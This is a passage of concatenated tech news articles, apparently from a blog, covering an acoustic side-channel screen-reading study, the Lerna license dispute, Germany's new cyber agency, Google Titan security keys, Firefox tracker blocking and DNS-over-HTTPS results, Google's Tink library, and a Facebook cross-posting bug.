correct typed word was in the top three choices for the portrait mode classifier 99.6 percent of the time.) In a third experiment, the researchers used guided machine learning in an attempt to extract text from displayed content based on the audio—a much more fine-grained sort of data than detecting changes in screen keyboard intensity. In this case, the experiment focused on a test set of 100 English words and also used somewhat ideal display settings for this sort of capture: all the letters were capitalized (in the Fixedsys Excelsior typeface with a character size 175 pixels wide) and black on an otherwise white screen. The results, as the team reported them, were promising: The per-character validation set accuracy (containing 10% of our 10,000 trace collection) ranges from 88% to 98%, except for the last character where the accuracy was 75%. Out of 100 recordings of test words, for two of them preprocessing returned an error. For 56 of them, the most probable word on the list was the correct one. For 72 of them, the correct word appeared in the list of top-five most probable words. While these tests were all done with a single monitor type, the researchers also demonstrated that a "cross screen" attack was possible—by using a remote connection to display the same image on a remote screen and recording the audio, it was possible to calibrate a baseline for the targeted screen. It's clear that there are limits to the practicality of acoustic side-channels as a means of remote surveillance. But as people move to use mobile devices such as smartphones and tablets for more computing tasks—with embedded microphones, limited screen sizes, and a more predictable display environment—the potential for these sorts of attacks could rise. And mitigating the risk would require re-engineering of current screen technology. So, while it remains a small risk, it's certainly one that those working with sensitive data will need to kept in mind—especially if they're spending much time in Google Hangouts with that data on-screen. Read more on this page. Google Titan Security key with secure FIDO two factor authentication is now available for purchase 6 artificial intelligence cybersecurity tools you need to know Defending Democracy Program: How Microsoft is taking steps to curb increasing cybersecurity threats to democracy

It was only two days ago when Jamie Kyle, a Lerna Developer decided to modify the Lerna’s license to ban companies who are the U.S. Immigration and Customs Enforcement ( ICE ) contractors from using the software. This decision has now been reverted by the Lerna Core team and Kyle has been removed from the development project. Now, any organization who wishes to use the Lerna software is free to use it. Kyle stated, on Wednesday, over Github how he has been deeply disturbed by ICE’s behavior with American immigrants and the companies who have collaborated with ICE “don’t have any licensing rights” and “any use of Lerna will be considered theft”. Daniel Stockman, a core Lerna contributor, removed Kyle from the project, yesterday morning and pointed out that the license change was a “rash decision” that was “unenforceable”. He also added that there were “several past violations of [Lerna’s] code of conduct” as there were instances when Kyle’s behavior was rude and impolite. As reported to Motherboard, Kyle thinks his removal from the team is a result of Stockman’s discussion of the issue with Microsoft employees. But, Stockman denied the characterization to Motherboard. “I think developers can be activists if they so choose, and I support tools and licenses designed to make this easier,” said Stockman. He also added that because he is willing to revoke the relicensing doesn’t mean that he is an ICE supporter, and described ICE as “monstrous” and “must be abolished”. Public opinion about Lerna’s current decision is varied: https://twitter.com/alicegoldfuss/status/1035214998375559173 https://twitter.com/xander76/status/1034842377775529984 https://twitter.com/chriseppstein/status/1034863523493339136 https://twitter.com/benwiley4000/status/1035031630333796352 https://twitter.com/siziyman/status/1035051041111326720 “Open source, even in a project where there is only one active contributor, is never just about one individual. Even acquiescence from multiple core contributors is not sufficient to justify a change like this,” says Stockman. For more coverage on the news, check out the post by Motherboard. Skepticism welcomes Germany’s DARPA-like cybersecurity agency – The federal agency tasked with creating cutting-edge defense technology Amazon calls Senator Sanders’ claims about ‘poor working conditions’ as “inaccurate and misleading” Google slams Trump’s accusations, asserts its search engine algorithms do not favor any political ideology  

On Wednesday, the German government announced the creation of a new federal agency to develop cutting-edge cyber defense technology. The agency would resemble the U.S. Defense Advanced Research Projects Agency (DARPA) and would be managed by the Ministry of Defense and the Ministry of the interior. Germany has always had background of rising numbers of cyber attacks. German Defense Minister Ursula von der Leyen affirms that the agency would encourage Germany’s investment in new technologies and in the protection of critical digital infrastructure. The agency will also be partnering with other EU countries on agency projects. The agency akin to DARPA will make Germany more independent in its fight against cyber threats. Ministers in Chancellor Angela Merkel’s government said on Wednesday that Germany will invest €200 million over the next five years to launch this agency that will develop its own cyber defense capabilities. The news, however, was not taken well by some lawmakers who have expressed their concerns about the new agency. The issue of military-led and cyber warfare has been a  disputable topic in Germany. Anke Domscheit-Berg, digital policy spokeswoman for the Left Party, expressed her concern on this matter. She believes that more digital security would definitely help Germany, however, her apprehension lies in the fact that the agency is located between the Defense Ministry and the Interior Ministry. Green Party spokesman Konstantin von Notz argued that the agency will work against the Foreign Ministry’s work. In a statement released to DW, Noz mentioned that the agency would massively undermine the Foreign Ministry’s efforts at the UN to outlaw cyber weapons Instead of promoting a spiraling escalation in the digital space, the government needs to make a U-turn on IT security.” Read the entire coverage of this article on DW for more insights on the matter. Facebook’s AI algorithm finds 20 Myanmar Military Officials guilty of spreading hate and misinformation, leads to their ban Google Employees Protest against the use of Artificial Intelligence in Military Fitness app Polar reveals military secrets

In July, Google had announced the Titan Security keys built with hardware chip to verify key integrity. Now they are available for purchase from the Google store. The security key looks like a dongle and provides two factor authentication which is more secure than just a username and password. These Titan keys are based on the FIDO standards which Google considers as the strongest and most phishing resistant two factor authentication method. This security key was initially made available to Google Cloud users. Now it is available to the public. How does the Google Titan key protect your account? Security keys are based on a standard public key cryptography protocol. The client registers a public key with the online service initially and during the authentication. Then for authentication, the online service asks the client to prove its ownership of the private key with a cryptographic signature. Google jointly contributed to the two factor authentication technical specifications to the FIDO Alliance and launched support for Gmail in 2014. The company has been working with Yubico and NXP to develop security keys internally from 2012. In a Google Cloud Blog post, Christiaan Brand, Product Manager, Google Cloud stated, “At Google, we have had not reported or confirmed account takeovers due to password phishing since we began requiring security keys as a second factor for our employees.” Google has engineered the firmware in the chips with security in mind. This firmware is permanently sealed in a secure hardware chip and is resilient to hardware attacks. Therefore the security factor is sealed in the chip itself during manufacture. FIDO has standardized the authentication protocol used between the client and server. This protocol is being implemented in popular operating systems like Android and Chrome and also the Chrome browser. The security keys can be used to authenticate services like Google, Dropbox, Facebook, GitHub, Salesforce, Stripe, and Twitter. Do you need it? If you have important information in your accounts or would like stronger security as an individual or for your organization, the Google Titan key is a good option. It is available for $50 in the Google store (only US for now) and includes a Bluetooth and USB key with the required connectors. For more details visit the Google Cloud Blog. Google introduces Cloud HSM beta hardware security module for crypto key security Google’s Protect your Election program: Security policies to defend against state-sponsored phishing attacks, and influence campaigns Defending Democracy Program: How Microsoft is taking steps to curb increasing cybersecurity threats to democracy

Mozilla is taking a stand against web advertising practices with an announcement today that its Firefox browser will soon block web trackers by default. Users can expect a series of updates over the next few months while this feature comes into reality. This proactive approach to protect consumer privacy, aims to give them more choice over what information they share with third party sites. Mozilla has been always in the forefront of giving users the assurity of data privacy. They started off by blocking pop-up ads in the very first public Firefox release in 2004. The wholesale blocking of ads and trackers in private browsing mode starting in 2015 is another testament to the fact. Mozilla has made it clear that even though some sites will continue to want user data in exchange for content, they will have to ask users for it. This gives advertising platforms a reason to care about their users’ experience and is a positive change for people who up until now had no idea of the value exchange they were asked to make. Mozilla’s three key initiatives to put this approach into practice: #1 Improving page load performance A new feature will be introduced in Firefox Nightly that will blocks trackers slowing down page loads. Loading third party trackers makes it slow for a website to load as a whole. For users on slower networks, the effect is worse. This messes with the user’s experience on the web. Firefox will study the effects of blocking trackers and test the new feature using a shield study in September.  If the approach succeeds in improving page performance well, slow-loading trackers will be blocked by default in Firefox 63. #2 Removing cross-site tracking Users expect a certain level of privacy on the web. However, many web browsers fail to help users obtain the level of privacy that they should be entitled to. Taking this into account, Firefox will strip cookies and block storage access from third-party tracking content. This is already available for Firefox Nightly users to try out. A shield study will be carried out with some beta users in September to check this feature. All Firefox 65 users can expect this update coming their way soon. After all, no one appreciates the thought of being constantly tracked by third-party sites to obtain information in secret. #3 Mitigating harmful practices The third approach Mozilla is taking is to block harder-to-detect practices like fingerprinting-a technique that allows them to invisibly identify users by their device properties. This will also put a stop on crypto mining scripts that silently mine cryptocurrencies on the user’s device. The Twitter community has received this news well and many Firefox users have expressed their appreciation over this initiative. Source: Twitter The November release of Firefox 57, added an option to let people block all trackers. Worldwide, 1.3 percent of people enable Firefox tracking protection today which means out of   250 million monthly active users, it represents the choice of about 3 million people. Now as a bonus, users can block add trackers as well! Source: Cnet.com This goes to show the level of trust that users have in Firefox and we are sure that like always firefox will not disappoint. You can read the detailed news of the upcoming update on Mozilla’s official blog. Mozilla’s new Firefox DNS security updates spark privacy hue and cry Mozilla, Internet Society, and web foundation wants G20 to address “techlash” fuelled by security and privacy concerns Firefox Nightly’s Secure DNS Experimental Results out  

Google announced yesterday the release of a new version of its multi-language, cross-platform cryptographic library, named, Tink 1.2.0 to secure data. Earlier versions of Tink are already in use by Google to secure data of their products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, etc. Tink 1.2.0 is built on top of libraries such as BoringSSL, and Java Cryptography Architecture. It comprises cryptographic APIs that are secure, easy to use, and hard to misuse. With Tink 1.2.0, it is easy to perform cryptographic operations like data encryption, digital signatures, etc, as it requires only a few lines of code. It focuses on eliminating as many data misuses as possible. For instance, if the encryption mode needs nonces and reusing nonces would make the encryption mode less secure, then Tink does not allow the user to pass nonces. Tink 1.2.0 also indicates security properties (e.g., safe against chosen-ciphertext attacks) directly in interfaces. This enables security auditors and automated tools to quickly discover usages where security guarantees don’t align with the security requirements. It provides support for key management, which includes, key rotation and phasing out of deprecated ciphers. Other than that, Tink 1.2.0 is customizable. This means that it is easy to add a custom cryptographic scheme or an in-house key management system that can work seamlessly with other parts of Tink. All the parts of Tink are easily removable as well as compostable. The components in Tink 1.2.0 can be selected and assembled in various combinations. As an example, if only digital signatures are needed, then symmetric key encryption components can be excluded to reduce the code size in your application. For more information, check out the official Google blog. Say hello to Sequoia: a new Rust based OpenPGP library to secure your apps Google releases new political ads library as part of its transparency report Google slams Trump’s accusations, asserts its search engine algorithms do not favor any political ideology

Following Facebook’s move to restrict cross-posts from other platforms earlier this month via changes to its API platform, many users noticed their old Twitter posts disappearing from Facebook this week. The cross-posting option lets users publish their Twitter posts to Facebook automatically. The absence of cross posting was first noticed by users who heavily relied on cross-posting to keep their Facebook active. Without that feature, the Twitter app for Facebook was not of much use. This had caused a lot of old posts to disappear, first noticed around August 26, leaving users furious. Some of the users’ profiles were left fairly empty since they relied on cross-posting to keep their accounts active. Facebook API platform changes are a part of Facebook’s plan to take strict measures on misuse of its platform after the Cambridge Analytica scandal at the start of this year. Since then, Facebook has been taking a variety of efforts to prevent data misuse; stopping third-parties from being able to post to Facebook is one of them. TechCrunch was the first to report on the issue is sudden disappearance of cross-posts from Twitter, and Facebook confirmed to them the same day that it is checking the issue. Common belief is that changes in the API to prevent cross-posting would not have mass-deleted all the older posts. Following these changes from Facebook, Twitter asked Facebook for its app to be deleted from their platform. The result was users’ old Twitter posts on Facebook getting deleted. Turns out that this was just a bug and now it is fixed. In a statement to Axios, Facebook cleared the confusion saying "A Twitter admin requested their app be deleted, which resulted in content that people had cross-posted from Twitter to Facebook also being temporarily removed from people’s profiles. However, we have since restored the past content and it's now live on people’s profiles." You can find the original report on TechCrunch. Facebook Watch is now available world-wide challenging video streaming rivals, YouTube, Twitch, and more A new conservative employee group within Facebook to protest Facebook’s “intolerant” liberal policies Facebook’s AI algorithm finds 20 Myanmar Military Officials guilty of spreading hate and misinformation, leads to their ban

During July 2018, a planned Firefox Nightly experiment was performed involving secure DNS via the DNS over HTTPS (DoH) protocol. About 25,000 Firefox Nightly 63 users had agreed to be part of Nightly experiments and participated in this study. Cloudflare operated the DoH servers that were used according to the privacy policy they had agreed to with Mozilla. Each user was additionally given information directly in the browser about the project. That information included the service provider, and an opportunity to decline participation in the study. Browser users are currently experiencing spying and spoofing of their DNS information due to reliance on the unsecured traditional DNS protocol. Using a trusted DoH cloud based service in place of traditional DNS is a significant change in how networking operates and it raises many things to consider as we go forward when selecting servers. However, the initial experiment focused on validating two separate important technical questions: Does the use of a cloud DNS service perform well enough to replace traditional DNS? Does the use of a cloud DNS service create additional connection errors? The experiment is now complete and here are the finding highlights: The HTTPS with a cloud service provider shows a minor performance impact on the majority of non-cached DNS queries as compared to traditional DNS. Most queries were around 6 milliseconds slower, which seems to be an acceptable cost for the benefit of securing the data. However, the slowest DNS transactions performed much better with the new DoH based system than the traditional one – sometimes hundreds of milliseconds better. Source: Firefox Nightly The above chart shows the net improvement of the DoH performance distribution vs the traditional DNS performance distribution. The fastest DNS exchanges are at the left of the chart and the slowest at the right. The slowest 20% of DNS exchanges are radically improved (improvements of several seconds are truncated for chart formatting reasons at the extreme), while the majority of exchanges exhibit a small tolerable amount of overhead when using a cloud service. It shows a good result. The Firefox team hypothesized the improvements at the tail of the distribution derived from 2 advantages DoH provides compared to traditional DNS. First, the consistency of the service operation – when dealing with thousands of different operating system that are overloaded, unmaintained, or forwarded to strange locations. Second, HTTP’s use of modern loss recovery and congestion control allow it to better operate on very busy or low quality networks. The experiment also considered connection error rates and found that users using the DoH cloud service in ‘soft-fail’ mode experienced no statistically significant different rate of connection errors than users in a control group using traditional DNS. Soft-fail mode primarily uses DoH, but it will fallback to traditional DNS when a name does not resolve correctly or when a connection to the DoH provided address fails. The connection error rate measures whether an HTTP channel can be successfully established from a name and therefore incorporates the fallbacks into its measurements. These fallbacks are needed to ensure seamless operation in the presence of firewalled services and captive portals. “We’re committed long term to building a larger ecosystem of trusted DoH providers that live up to a high standard of data handling. We’re also working on privacy preserving ways of dividing the DNS transactions between a set of providers, and/or partnering with servers geographically. Future experiments will likely reflect this work as we continue to move towards a future with secured DNS deployed for all of our users.” says the Firefox Nightly team. Mozilla’s new Firefox DNS security updates spark privacy hue and cry Firefox Nightly browser: Debugging your app is now fun with Mozilla’s new ‘time travel’ feature Firefox has made a password manager for your iPhone